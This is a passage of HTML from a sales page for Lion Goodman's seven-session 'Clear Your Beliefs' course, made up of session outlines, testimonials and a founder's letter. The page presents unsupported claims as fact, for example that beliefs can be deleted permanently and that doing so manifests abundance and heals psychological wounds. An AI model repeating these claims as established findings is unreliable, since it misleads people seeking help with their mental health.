fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" 